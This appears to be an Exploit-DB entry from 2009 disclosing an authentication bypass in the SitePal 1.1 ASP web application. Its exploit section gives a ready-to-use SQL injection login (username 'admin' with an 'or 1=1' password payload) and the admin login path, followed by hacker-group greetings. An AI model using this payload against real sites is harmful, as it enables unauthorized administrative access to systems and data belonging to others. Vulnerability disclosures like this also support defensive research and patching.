SitePal 1.1 - Authentication Bypass

EDB-ID:

10465

CVE:

N/A


Platform:

ASP

Published:

2009-12-15

[~] SitePal v1.1(Auth Bypass) Remote SQL Injection Vulnerability
[~]
[~] ----------------------------------------------------------
[~] author: R3d-D3v!L
[~]
[~] Date: 15.12.2009
[~] 7!M3:1-35
[~] Home: www.Xp10.ME
[~]
[~] contact: N/A
[~]
[~] -----------------------------------------------------------


[~] Exploit:


username:admin
password: X' or ' 1=1--

[~] admin login for demo:

server/SitePalDemo/z_admin_login.asp



[~]--------------------------------------------------------------------------------
[~] Greetz tO:dolly & ab0 mohammed & XP_10 h4CK3R&  JASM!N & c0prA & MY-M!ND ;)
[~]
[~] mkank.com
[~] spechial thanks :{off-s3c} & ((dolly)) & ((7am3m)) & dev!l_mody & 0R45hy & meg4 ;)
[~]
[?] 4.!.5 ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA--.....
[~]
[~]I4M:4r48!4N-3XPLO!73R

[~]
[~]--------------------------------------------------------------------------------